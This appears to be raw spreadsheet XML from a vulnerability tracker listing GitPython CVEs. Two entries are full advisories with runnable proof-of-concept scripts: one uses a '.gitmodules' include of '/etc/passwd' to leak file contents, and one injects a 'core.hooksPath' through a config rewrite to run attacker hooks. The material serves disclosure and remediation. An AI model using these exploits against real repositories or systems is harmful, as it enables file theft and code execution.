None.</t></is></c><c r="T1598" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77078</t></is></c></row><row r="1599"><c r="A1599" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1599" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1599" s="5" t="inlineStr"><is><t>CVE-2026-7809</t></is></c><c r="D1599" s="5" t="inlineStr" /><c r="E1599" s="5" t="inlineStr" /><c r="F1599" s="5" t="inlineStr" /><c r="G1599" s="5" t="inlineStr" /><c r="H1599" s="5" t="inlineStr" /><c r="I1599" s="5" t="inlineStr" /><c r="J1599" s="5" t="inlineStr" /><c r="K1599" s="5" t="inlineStr" /><c r="L1599" s="5" t="inlineStr" /><c r="M1599" s="5" t="inlineStr" /><c r="N1599" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1599" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1599" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1599" s="5" t="inlineStr" /><c r="R1599" s="5" t="inlineStr" /><c r="S1599" s="5" t="inlineStr"><is><t>Rejected reason: This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.</t></is></c><c r="T1599" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-7809</t></is></c></row><row r="1600"><c r="A1600" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1600" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1600" s="5" t="inlineStr"><is><t>CVE-2026-78675</t></is></c><c r="D1600" s="5" t="inlineStr" /><c r="E1600" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1600" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1600" s="5" t="inlineStr" /><c r="H1600" s="5" t="n"><v>0.001</v></c><c r="I1600" s="5" t="inlineStr" /><c r="J1600" s="5" t="inlineStr" /><c r="K1600" s="5" t="inlineStr" /><c r="L1600" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1600" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1600" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1600" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1600" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1600" s="5" t="inlineStr" /><c r="R1600" s="5" t="inlineStr" /><c r="S1600" s="5" t="inlineStr"><is><t># [HIGH] Arbitrary local file content disclosure via `[include]` directive in untrusted `.gitmodules` (`SubmoduleConfigParser` never disables `merge_includes`)

- **CWE:** CWE-200 (Exposure of Sensitive Information) / CWE-73 (External Control of File Name or Path)
- **Affected component:** `git/objects/submodule/base.py`, `Submodule._config_parser()` (~line 273) constructing `SubmoduleConfigParser(fp_module, read_only=read_only)`; `git/config.py`, `GitConfigParser.__init__` (`merge_includes` default), `GitConfigParser.read()`/`_included_paths()` (include-path resolution, ~lines 630-685), `GitConfigParser._read()` (~line 493-498, `MissingSectionHeaderError`)
- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)

## Reachability
`GitConfigParser.__init__` defaults `merge_includes=True`: any config file it parses has its `[include]` (and, when a `repo=` is supplied, `[includeIf ...]`) directives followed and merged in. The maintainers already recognized this as dangerous for one specific case and fixed it in commit `41ecc6a4` ("Disable merge_includes in config writers"), which passes `merge_includes=False` when `Repo.config_writer()` builds its parser (`git/repo/base.py`).

That fix never touched `Submodule._config_parser()`. This method builds the parser used for **every** read of a repo's submodule configuration — `repo.submodules`, `Submodule.iter_items()`, `Submodule.config()` — via `SubmoduleConfigParser(fp_module, read_only=read_only)`, passing neither `merge_includes=False` nor `repo=`. The `True` class default is therefore inherited unchanged, and `fp_module` here is `.gitmodules` — **the single most attacker-controlled config file in the entire codebase**, since it ships verbatim as tracked content inside any cloned repository.

`GitConfigParser.read()`'s include-path resolution (~line 662-680) performs no containment check: `osp.isabs(include_path)` short-circuits the path join entirely for an absolute path, and a relative path is joined with `osp.join(osp.dirname(file_path), include_path)` / `osp.normpath()`'d with no check that the result stays under the repository. `~` is expanded via `osp.expanduser`. The only gate before opening is `os.access(include_path, os.R_OK)` — a readability check, not a path restriction.

Once opened, `GitConfigParser._read()` parses the target file as git-config INI. If the first non-blank/non-comment line is not a `[section]` header — true of virtually any non-gitconfig file (source code, `/etc/passwd`, `.env` files, credential files, logs, JSON/YAML) — it raises `configparser.MissingSectionHeaderError(fpname, lineno, line)`. Python's stdlib formats this exception's `str()` as `"File contains no section headers.\nfile: %r, line: %d\n%r" % (fpname, lineno, line)` — it embeds the **verbatim content** of that file's first line in the exception message. `Submodule.iter_items()` catches only `(IOError, BadName)`, not `configparser.Error`, so this exception propagates straight out of the ordinary, read-only `repo.submodules` call.

## Root cause
Parity gap between two config-parser construction sites for the exact same footgun: `Repo.config_writer()` was hardened against `merge_includes` in 2023 (`41ecc6a4`); `Submodule._config_parser()` — which parses `.gitmodules`, content that is *always* attacker-controlled the moment a repository is cloned from an untrusted source — was never given the same treatment. (The submodule *write*-mode config parser at `git/objects/submodule/base.py` for `.git/modules/&lt;name&gt;/config` — a different, locally-generated file — has correctly passed `merge_includes=False` since 2022, underscoring that the omission for `.gitmodules` reads looks like an oversight rather than a considered exception.)

## Exploit path
1. Attacker crafts a repository whose `.gitmodules` contains a legitimate-looking `[submodule ...]` section plus:
   ```
   [include]
   	path = /etc/passwd
   ```
   (an absolute path bypasses any traversal reasoning entirely; a relative `../../../../etc/passwd`-style path works too).
2. Victim performs the extremely common, entirely read-only operation of enumerating a cloned repo's submodules: `list(repo.submodules)` (or any `for sm in repo.submodules`) — no `update()`, `init()`, or checkout of any kind required.
3. `SubmoduleConfigParser` (inheriting `merge_includes=True`) follows the `[include]` directive, opens `/etc/passwd`, and `GitConfigParser._read()` raises `MissingSectionHeaderError` whose message embeds `/etc/passwd`'s first line verbatim.
4. This exception surfaces wherever the host application observes exceptions from GitPython — CI logs, error pages, exception trackers, or any dependency-scanner/code-review-bot/hosting-platform tool built on `repo.submodules` — disclosing the targeted file's first line to the attacker (directly, or indirectly via any channel that echoes the error).

## Impact
Non-blind local file content disclosure (first line) of any file readable by the victim process, triggered purely by attacker-controlled repository content and one routine, read-only GitPython call. Bounded to one line per triggering file (parsing aborts at the first `MissingSectionHeaderError`), but that line very often *is* the secret — `.env` files (`DATABASE_URL=...`, `API_KEY=...`), single-line credential/token files, `/etc/passwd`'s root entry for host fingerprinting. The primitive additionally serves as a generic error-based file-existence oracle for arbitrary host paths. This is materially stronger than the already-fixed, explicitly **blind** `GHSA-cwvm-v4w8-q58c` ("Blind local file inclusion", CVSS 4.0, `git/refs/symbolic.py` ref-name resolution) — that advisory's own writeup states it cannot disclose content; this one does, verbatim, via a different module (`git/config.py`'s include resolution).

## Preconditions
- Victim clones (or otherwise opens with GitPython) a repository whose `.gitmodules` is attacker-controlled — the default trust model for any tool that processes third-party repositories (dependency scanners, CI, code hosting/review bots, "audit this repo" utilities — exactly the class of application GitPython itself is built for).
- Victim performs any operation that touches `repo.submodules` — one of the most ordinary GitPython operations, requiring no submodule `update`/`init`/checkout.
- No authentication/role requirement inside GitPython itself.

## Evidence
- `git/config.py` — `GitConfigParser.__init__` defaults `merge_includes=True`.
- `git/objects/submodule/base.py:273` — `SubmoduleConfigParser(fp_module, read_only=read_only)` passes neither `merge_includes` nor `repo=`; `git blame` shows this call unchanged since the class was introduced, and `git show 41ecc6a4` confirms that commit touched only `git/repo/base.py`'s `Repo.config_writer()`, never this call site.
- `git/config.py` `_included_paths()`/`read()` (~630-685) — absolute include paths bypass the join/normpath entirely (`osp.isabs()` short-circuit); no repository-boundary containment check exists anywhere in this path.
- `git/config.py` `_read()` (~493-498) — raises `cp.MissingSectionHeaderError(fpname, lineno, line)` with the raw file line embedded, matching Python stdlib `configparser`'s own `__str__` behavior.
- `Submodule.iter_items()` catches only `(IOError, BadName)` — `configparser.Error` (the base of `MissingSectionHeaderError`) is not swallowed.
- PoC (`gitpython-003-poc.py`, embedded below) reproduces this end-to-end against this exact checkout via the public API only (`Repo.clone_from` + `list(repo.submodules)`, default arguments, no monkeypatching), against both a throwaway secret file and `/etc/passwd`.

## False-positive check (adversarial re-read)
- **Is this the same bug as `GHSA-hmq2-w58f-27jc`?** No — that advisory is about the `.gitmodules` submodule *name* driving `_module_abspath`/`os.makedirs()` (creating a git repository/module directory outside the working tree, a write/RCE-adjacent primitive via a completely different function). This finding is about the `[include]` directive in the *same file* reaching a config-parser read primitive — a different mechanism, different function, different impact class (content disclosure, not directory creation).
- **Is this the same bug as `GHSA-cwvm-v4w8-q58c` (blind LFI)?** No — that advisory is explicitly documented by its own reporter as content-free/blind (existence-only), and lives in `git/refs/symbolic.py`'s ref-name resolution feeding `Repo.commit`/`tree`/`index.diff` — an entirely different module and code path. This finding discloses actual file content via `git/config.py`'s include-directive resolution.
- **Is the impact overstated given only one line leaks?** No — this is an accurate scoping caveat already reflected in the severity/impact discussion, not a reachability blocker: attacker has full control over which path is targeted (absolute paths work unconditionally), requires zero interaction beyond the single most common submodule operation, and the PoC demonstrates a real, working end-to-end disclosure through the standard `clone_from` + `list(repo.submodules)` workflow.
- **Could the exception simply be silently swallowed by GitPython before reaching the caller?** No — confirmed by reading `Submodule.iter_items()`'s exception handling, which catches only `IOError`/`BadName`; `configparser.MissingSectionHeaderError` propagates uncaught.
- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently against both a throwaway secret file and `/etc/passwd`.

## Remediation
Pass `merge_includes=False` when constructing `SubmoduleConfigParser` in `Submodule._config_parser()` (`git/objects/submodule/base.py`), mirroring the existing fix in `Repo.config_writer()` (commit `41ecc6a4`) — `.gitmodules` content is always attacker-controlled and should never be allowed to pull in `include`/`includeIf` directives. As defense in depth, `GitConfigParser.read()`'s include-path resolution should enforce that resolved include paths stay within the repository's own directory tree, and parsing-error messages (`MissingSectionHeaderError`/`ParsingError`) should avoid embedding raw file content when parsing a file the caller did not explicitly ask to open.

## Confidence
High. Root cause confirmed by direct code reading across both `git/config.py` and `git/objects/submodule/base.py`, cross-checked against the fix commit that hardened the sibling code path but not this one; exploit chain reproduced independently, twice, against the current HEAD (a throwaway secret file and `/etc/passwd`).


## Proof-of-Concept source (`gitpython-003-poc.py`)

```python
#!/usr/bin/env python3
"""
GITPYTHON-003 PoC: `.gitmodules` -- fully attacker-controlled content shipped
inside a cloned repository -- can contain `[include] path = &lt;any local path&gt;`.
`Submodule._config_parser()` builds the parser used for `repo.submodules` (and
other submodule reads) via `SubmoduleConfigParser(fp_module, read_only=...)`
without passing `merge_includes=False`, so the class default `merge_includes=True`
is inherited. GitConfigParser then opens the target file; if it isn't valid
git-config syntax (true of virtually any non-gitconfig file), Python's
`configparser.MissingSectionHeaderError` embeds the file's first line verbatim
in its exception message, which propagates out of the ordinary, read-only
`repo.submodules` call -- a non-blind local file content disclosure primitive.

Run:
  PYTHONPATH="&lt;repo&gt;:&lt;repo&gt;/gitdb:&lt;repo&gt;/smmap" python3 gitpython-003-poc.py &lt;workdir&gt; &lt;target-file&gt;

Benign: reads only the given &lt;target-file&gt; (defaults to a throwaway secret file
created under &lt;workdir&gt; if omitted) and never writes/exfiltrates it anywhere
except printing it locally to prove the primitive. No destructive action.
"""
import os
import subprocess
import sys


def main():
    workdir = sys.argv[1] if len(sys.argv) &gt; 1 else "/tmp/gitpython-003-poc"
    target_file = sys.argv[2] if len(sys.argv) &gt; 2 else os.path.join(workdir, "secret.txt")

    attacker_repo = os.path.join(workdir, "attacker-repo")
    dest = os.path.join(workdir, "dest")
    for p in (attacker_repo, dest):
        os.makedirs(p, exist_ok=True)

    if not os.path.exists(target_file):
        os.makedirs(os.path.dirname(target_file), exist_ok=True)
        with open(target_file, "w") as f:
            f.write("TOP-SECRET-DB-PASSWORD=hunter2-actual-secret-value\n")

    subprocess.run(["git", "init", "-q", "-b", "main", attacker_repo], check=True)
    subprocess.run(["git", "-C", attacker_repo, "config", "user.email", "a@example.com"], check=True)
    subprocess.run(["git", "-C", attacker_repo, "config", "user.name", "Attacker"], check=True)

    with open(os.path.join(attacker_repo, "file.txt"), "w") as f:
        f.write("hello\n")

    with open(os.path.join(attacker_repo, ".gitmodules"), "w") as f:
        f.write(
            '[submodule "totally-normal-dep"]\n'
            "\tpath = vendor/dep\n"
            "\turl = https://example.com/dep.git\n"
            "[include]\n"
            "\tpath = %s\n" % target_file
        )

    subprocess.run(["git", "-C", attacker_repo, "add", "file.txt", ".gitmodules"], check=True)
    subprocess.run(["git", "-C", attacker_repo, "commit", "-q", "-m", "init"], check=True)

    import git  # gitpython under test
    import configparser

    repo = git.Repo.clone_from(attacker_repo, dest)

    try:
        subs = list(repo.submodules)
        print("NOT VULNERABLE: no exception raised, submodules =", subs)
        sys.exit(1)
    except configparser.MissingSectionHeaderError as e:
        msg = str(e)
        print("VULNERABLE: MissingSectionHeaderError leaked file content via repo.submodules:")
        print(msg)
        with open(target_file) as f:
            first_line = f.readline().rstrip("\n")
        if first_line in msg:
            print("Confirmed: target file's first line is present verbatim in the exception message.")
            sys.exit(0)
        else:
            print("NOT VULNERABLE: exception message did not contain the expected content")
            sys.exit(1)


if __name__ == "__main__":
    main()

```</t></is></c><c r="T1600" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78675</t></is></c></row><row r="1601"><c r="A1601" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1601" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1601" s="5" t="inlineStr"><is><t>CVE-2026-78676</t></is></c><c r="D1601" s="5" t="inlineStr" /><c r="E1601" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F1601" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1601" s="5" t="inlineStr" /><c r="H1601" s="5" t="n"><v>0.004</v></c><c r="I1601" s="5" t="inlineStr" /><c r="J1601" s="5" t="inlineStr" /><c r="K1601" s="5" t="inlineStr" /><c r="L1601" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1601" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1601" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1601" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1601" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1601" s="5" t="inlineStr" /><c r="R1601" s="5" t="inlineStr" /><c r="S1601" s="5" t="inlineStr"><is><t>- **CWE:** CWE-88 (Argument Injection) / CWE-94 (Code Injection) — via a read-then-corrupt-on-rewrite config round trip, not a direct setter argument
- **Affected component:** `git/config.py` — `GitConfigParser._read()` (multi-line value decoding, lines 444-541, esp. `string_decode()` at line 460 and its call sites at 519/541) and `GitConfigParser._write()`/`write_section()` (serialization, lines ~694-712, esp. line 708)
- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)

## Reachability
GitPython added `UNSAFE_CONFIG_CHARS_RE` / `_value_to_string_safe()` / `_assure_config_name_safe()` guards (commits `c417af46`, `1ed1b924`, `a495ccd3`, and PR #2176) to reject a Python string containing a raw `\r`/`\n`/NUL byte, or syntax-bearing characters, when it is passed as an **argument** to `set()`, `set_value()`, `add_value()`, or `add_section()`. This closed the four config-injection GHSAs above.

That guard is applied only on the write-argument surface. It is never consulted for values that entered `GitConfigParser._sections` via `_read()` — i.e. values that came from parsing an on-disk config file. And `_read()` legitimately supports standard, spec-compliant git config syntax for multi-line values: a quoted value that is not closed on the same physical line continues onto the next physical line (git's own backslash-continuation syntax), and `string_decode()` (`.decode('unicode_escape')`) decodes a literal two-character `\n` **escape sequence** inside such a value into a real embedded LF character in the resulting Python string. No raw control byte is ever written to disk to achieve this — it's the same syntax real `git` itself uses and accepts.

The bug is in what happens when that `GitConfigParser` is later **flushed**: `write_section()` (line ~694) calls the *unsafe* `self._value_to_string(v)` — not `_value_to_string_safe()` — and "handles" any embedded newline in the value with `.replace("\n", "\n\t")` (line 708), emitting a bare, unquoted `&lt;real newline&gt;&lt;tab&gt;` in the output file with no re-quoting and no backslash-continuation marker. Real git does **not** treat an indentation-only continuation the way GitPython's writer assumes — a value only continues across physical lines when the *previous* line ends in a literal `\` immediately before the newline. So the moment `write_section()` re-serializes a previously-decoded multi-line value this way, the second half of that value becomes an **independent, new config line** the next time anyone (GitPython or real `git`) parses the file. If an attacker chooses the dormant value's content to be `&lt;anything&gt;\nhooksPath = &lt;attacker path&gt;`, that second line is parsed as a brand-new `core.hooksPath = &lt;attacker path&gt;` directive — live, real Git configuration, not a value.

`core.hooksPath` is honored by essentially every hook-firing git operation (`commit`, `checkout`, `merge`, `push`, `rebase`, ...), giving arbitrary code execution the next time the host application performs any hook-triggering operation.

## Root cause
`GitConfigParser`'s injection guard is asymmetric: it hardens every *write-argument* entry point (the fix for the four sibling GHSAs) but never hardens the **read → corrupt-on-rewrite round trip**. A value that is 100% legitimate and inert as parsed from disk becomes a newly-injected directive purely through GitPython's own broken re-serialization logic (`write_section()` using the unsafe value-to-string path plus a continuation scheme real git doesn't recognize). The `c417af46` commit message even states its intent explicitly: *"This preserves existing read behavior for config files that already contain multiline values while preventing GitPython from writing new unsafe values"* — i.e. the maintainers consciously scoped the fix to the write-argument surface and did not address what happens when an already-resident multi-line value gets rewritten.

## Exploit path
1. A `.git/config` (or any file merged into it via `[include]`, see below) already contains a dormant, syntactically-legitimate multi-line quoted value, e.g.:
   ```
   [core]
   	zzz = "A\nhooksPath = ../evil-hooks\
   "
   ```
   No raw `\r`, `\n`, or NUL byte appears on disk — this is standard git quoting + backslash-continuation. Real `git config --get core.hookspath` returns nothing at this point (inert); `git config --get core.zzz` returns the decoded string `A\nhooksPath = ../evil-hooks`, identically to GitPython's own reader.
2. The host application opens this repo with GitPython (`git.Repo(path)`, `read_only=False` implicitly for a normal `config_writer()` use) and performs **any** single, unrelated, legitimate config write on the same `GitConfigParser` instance — e.g. `repo.config_writer().set_value("user", "name", "Test User")`. This is one of the most ordinary operations a GitPython-based tool performs.
3. `GitConfigParser._write()`/`write_section()` re-serializes every resident value, including the dormant `zzz` entry, using the unsafe path. The file on disk now contains, verbatim:
   ```
   [core]
   	...
   	zzz = A
   	hooksPath = ../evil-hooks
   ```
4. Real `git config --get core.hookspath` now returns `../evil-hooks` — a key that did not exist before step 2, created purely by GitPython's own write.
5. The next hook-firing git operation (e.g. `git commit`) executes `../evil-hooks/pre-commit` (or whatever hook name the operation looks for), i.e. arbitrary attacker-chosen code execution.

## Impact
Arbitrary code execution, on par with (and more directly triggered than) the already-accepted, High-severity `GHSA-mv93-w799-cj2w`/`GHSA-v87r-6q3f-2j67` "Newline injection... enables RCE via core.hooksPath" advisories, and requiring **no unsafe caller argument at all** — only an attacker-influenced config file plus one ordinary, unrelated write.

## Preconditions
- A config file GitPython opens read-write already contains an attacker-chosen, syntactically-valid multi-line value shaped like `&lt;anything&gt;\n&lt;injected-key&gt; = &lt;injected-value&gt;`. Realistic delivery:
  1. **Pre-existing `.git` directory shipped with a repository** — vendored/template repos, CI workspace/layer caches that preserve `.git`, "repo" tarball/zip distributions that include `.git/config`. The poisoned value sits directly in `.git/config`.
  2. **The documented shared-config `[include]` pattern** (`[include] path = ../&lt;repo-tracked-file&gt;`, pointing at a file inside the working tree) — `GitConfigParser.read()` merges included files' sections into the same `_sections` dict used for writing, so a malicious public repository can ship the poisoned value inside a normal tracked file and have it activated the first time any GitPython-based tool performs any unrelated config write after clone (this requires the victim's own `.git/config` to already reference the include, e.g. via project setup tooling that adds `include.path`).
  3. **Any host application that opens an attacker-influenced config file for read-write and later performs a legitimate write** — the exact trust-boundary the maintainers already accepted as realistic for `GHSA-v87r-6q3f-2j67` (their writeup cites MLRun's `project.push()`).
- No authentication/role requirement inside GitPython itself.

## Evidence
- `git/config.py:460` (`string_decode`), invoked at `git/config.py:519` and `:541` inside `_read()`'s multi-line handling — decodes `unicode_escape`, turning a literal `\n` escape into a real embedded LF.
- `git/config.py:~694-712` (`_write()`/`write_section()`) — uses `self._value_to_string(v)` (unsafe variant) and `.replace("\n", "\n\t")` with no re-quoting.
- `c417af46` (the CR/LF/NUL guard commit) touches only the setter path and explicitly states it preserves existing *read* behavior for multi-line values, per its own commit message.
- `git log -S"string_decode"`, `-S"write_section"`, `-S'replace("\n", "\n\t")'` on `git/config.py` show these code paths have only ever been touched by non-security formatting/refactor commits (`a5fc1d86`, `b825dc74`, `cb68eef0`, `21ec5299`), never by a security fix.
- PoC (`gitpython-002-poc.py`, embedded below) reproduces the full chain end-to-end against this exact checkout: dormant value → one unrelated `config_writer()` write → `core.hookspath` becomes live per real `git config --get` → a subsequent `git commit` executes the injected hook and writes a benign marker file.

## False-positive check (adversarial re-read)
- **Is this just a repeat of the four already-fixed config-injection GHSAs?** No — all four require the *caller* to pass a Python string containing a raw control character or forbidden syntax character as an argument to a setter; all four are now blocked by `UNSAFE_CONFIG_CHARS_RE`/`VALID_CONFIG_OPTION_NAME_RE`/the section quote-state-machine. This finding requires no such caller argument: the payload is smuggled entirely inside a config *file* using standard, valid git escaping that the guard never inspects, and only becomes dangerous through GitPython's own unguarded re-serialization of a value it already holds. Confirmed via `_known-advisories.json` (26 entries, none withdrawn) — none describe this read→corrupt-on-rewrite mechanism.
- **Does real git actually round-trip this value safely (i.e. is this a GitPython-only bug, not a "normal" file)?** Yes, confirmed empirically: after the same crafted `.git/config` is rewritten by *real* `git config user.name Test2` (a control test), the multi-line `zzz` entry is preserved byte-for-byte in its original quoted/continuation form — only GitPython's writer corrupts it.
- **Is there a guard elsewhere that would catch the resulting bare `hooksPath = ...` line before it's trusted?** No — once on disk, it is indistinguishable from a directive the user set intentionally; `core.hooksPath` is honored unconditionally by git's hook-invocation machinery.
- **Does this require an unrealistic precondition?** The precondition (a config file with attacker-influenced content, later legitimately rewritten) mirrors the exact threat model the maintainers already treated as realistic and fixed for `GHSA-v87r-6q3f-2j67`.
- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently end-to-end (dormant value in place → benign unrelated `config_writer()` write → `core.hookspath` live per real git → hook fires on `git commit`, marker file written).

## Remediation
Either (a) make `write_section()`/`_write()` use `_value_to_string_safe()` (or equivalent re-quoting) for **every** resident value, including those that originated from `_read()`, so an embedded newline is always re-emitted as a properly quoted+backslash-continued value rather than a bare new line, or (b) reject/neutralize embedded control characters in values at read time before they can reach `_sections` at all if the parser is opened in `read_only=False` mode, or (c) canonicalize output using git's own `git config --file &lt;path&gt; --replace-all` semantics instead of a hand-rolled writer. Option (a) is the most surgical fix and matches the spirit of `_value_to_string_safe()` already used on the setter path.

## Confidence
High. Root cause independently re-derived and confirmed by direct code reading; full exploit chain (dormant value → benign unrelated write → live `core.hookspath` → hook execution with a benign marker) reproduced twice, independently, against the current HEAD.


## Proof-of-Concept source (`gitpython-002-poc.py`)

```python
#!/usr/bin/env python3
"""
GITPYTHON-002 PoC: a dormant, legitimately-encoded multi-line git-config value
(standard quoted + backslash-continuation syntax, containing an escaped "\\n"
that decodes to a real embedded newline in memory) is corrupted into a NEW,
live config key the moment GitConfigParser re-serializes it during any
unrelated write. If the smuggled second "line" looks like
"hooksPath = &lt;attacker path&gt;", it becomes a real, active core.hooksPath after
one unrelated GitPython config write, and fires attacker code on the next
hook-triggering git operation (e.g. `git commit`).

This is CWE-88/CWE-94 style argument/config injection, but via the READ path
(a config file GitPython parses and later rewrites), not via a Python kwarg
argument -- distinct from the already-fixed GHSA-mv93-w799-cj2w /
GHSA-v87r-6q3f-2j67 / GHSA-3rp5-jjmw-4wv2 / GHSA-jm78-9fvv-mhgr, which all
guard the setter-argument surface only.

Run:
  PYTHONPATH="&lt;repo&gt;:&lt;repo&gt;/gitdb:&lt;repo&gt;/smmap" python3 gitpython-002-poc.py &lt;workdir&gt;

Benign: only writes/reads inside &lt;workdir&gt;. The "malicious" hook just writes a
marker file; no destructive/exfiltrating payload. Exits non-zero and prints
"NOT VULNERABLE" if the corruption / hook does not fire.
"""
import os
import subprocess
import sys


def main():
    workdir = sys.argv[1] if len(sys.argv) &gt; 1 else "/tmp/gitpython-002-poc"
    repo_dir = os.path.join(workdir, "repo")
    hooks_dir = os.path.join(workdir, "evil-hooks")
    marker = os.path.join(workdir, "PWNED_MARKER.txt")

    for p in (repo_dir, hooks_dir):
        os.makedirs(p, exist_ok=True)
    if os.path.exists(marker):
        os.remove(marker)

    subprocess.run(["git", "init", "-q", "-b", "main", repo_dir], check=True)
    subprocess.run(["git", "-C", repo_dir, "config", "user.email", "test@example.com"], check=True)
    subprocess.run(["git", "-C", repo_dir, "config", "user.name", "Test"], check=True)

    # Rewrite .git/config with a dormant, 100%-valid multi-line quoted value
    # inside [core] (before any other section). No raw CR/LF/NUL byte is
    # written to disk here -- this is standard git config quoting +
    # backslash-line-continuation, decoded by both real git and GitConfigParser
    # into the Python string 'A\nhooksPath = ../evil-hooks'.
    cfg_path = os.path.join(repo_dir, ".git", "config")
    with open(cfg_path) as f:
        original = f.read()
    poisoned_entry = '\tzzz = "A\\nhooksPath = ../evil-hooks\\\n"\n'
    # Insert right after the [core] header line so it lives in the same section.
    new_config = original.replace("[core]\n", "[core]\n" + poisoned_entry, 1)
    with open(cfg_path, "w") as f:
        f.write(new_config)

    # Confirm it's inert per real git before touching GitPython.
    pre = subprocess.run(
        ["git", "-C", repo_dir, "config", "--get", "core.hookspath"],
        capture_output=True, text=True,
    )
    if pre.returncode == 0:
        print("SETUP ERROR: core.hookspath already set before GitPython touched anything")
        sys.exit(2)

    # Malicious hook: benign marker only.
    hook_path = os.path.join(hooks_dir, "pre-commit")
    with open(hook_path, "w") as f:
        f.write('#!/bin/sh\necho "PWNED-VIA-GITPYTHON-CONFIG-INJECTION" &gt; "%s"\nexit 0\n' % marker)
    os.chmod(hook_path, 0o755)

    import git  # gitpython under test

    repo = git.Repo(repo_dir)
    before = repo.config_reader().get_value("core", "zzz")
    print("core.zzz before any GitPython write =", repr(before))

    # ONE totally unrelated, benign write -- this is the only "attacker-adjacent"
    # action required, and it is something virtually every GitPython consumer
    # does routinely (setting an option, adding a remote, updating a branch's
    # tracking config, ...).
    with repo.config_writer() as cw:
        cw.set_value("user", "name", "Test User")

    post = subprocess.run(
        ["git", "-C", repo_dir, "config", "--get", "core.hookspath"],
        capture_output=True, text=True,
    )
    if post.returncode != 0:
        print("NOT VULNERABLE: core.hookspath still absent after the unrelated write")
        sys.exit(1)

    injected_path = post.stdout.strip()
    print("core.hookspath is now LIVE after one unrelated write:", injected_path)

    # Trigger the hook with a normal commit to prove it fires.
    with open(os.path.join(repo_dir, "file2.txt"), "w") as f:
        f.write("change\n")
    subprocess.run(["git", "-C", repo_dir, "add", "file2.txt"], check=True)
    subprocess.run(
        ["git", "-C", repo_dir, "-c", "user.email=t@example.com", "-c", "user.name=T",
         "commit", "-q", "-m", "trigger hook"],
        check=True,
    )

    if os.path.isfile(marker):
        with open(marker) as f:
            content = f.read().strip()
        print("VULNERABLE: hook fired, marker content =", content)
        sys.exit(0)
    else:
        print("NOT VULNERABLE: hook did not fire")
        sys.exit(1)


if __name__ == "__main__":
    main()

```</t></is></c><c r="T1601" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78676</t></is></c></row><row r="1602"><c r="A1602" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1602" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1602" s="5" t="inlineStr"><is><t>CVE-2026-78677</t></is></c><c r="D1602" s="5" t="inlineStr" /><c r="E1602" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1602" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="G1602" s="5" t="inlineStr" /><c r="H1602" s="5" t="n"><v>0.004</v></c><c r="I1602" s="5" t="inlineStr" /><c r="J1602" s="5" t="inlineStr" /><c r="K1602" s="5" t="inlineStr" /><c r="L1602" s="5" t="inlineStr"><is><t>PyPI:gitpython</t></is></c><c r="M1602" s="5" t="inlineStr"><is><t>3.1.59</t></is></c><c r="N1602" s="5" t="inlineStr"><is><t>OSV</t></is></c><c r="O1602" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1602" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1602" s="5" t="inlineStr" /><c r="R1602" s="5" t="inlineStr" /><c r="S1602" s="5" t="inlineStr"><is><t>- **CWE:** CWE-73 (External Control of File Name or Path) / CWE-22 (Path Traversal, in the "escapes intended base directory" sense)
- **Affected component:** `git/repo/base.py`, `Repo.unsafe_git_clone_options` (class attribute, lines 153-165) and `Repo._clone()` (lines 1477-1520), reached via the public `Repo.clone_from()` (line 1626) and `Repo.clone()` (line 1567) APIs.
- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)

## Reachability
`Repo.clone_from(url, to_path, **kwargs)` (and `Repo.clone()`) forward arbitrary keyword arguments to the underlying `git clone` invocation. Before forwarding, GitPython builds a candidate option list from the kwargs (`Git._option_candidates`) and checks it against a denylist, `Repo.unsafe_git_clone_options`, via `Git.check_unsafe_options()` — *unless* the caller passes `allow_unsafe_options=True`. This denylist mechanism is exactly the guard that the last ~16 published GHSAs against this repo (2026-07-12 → 2026-08-05) have repeatedly found incomplete or bypassable for other options (`--template`, `--upload-pack`, `--config`, `--exec`, `--output`, `--index-output`, `--pathspec-from-file`, etc.).

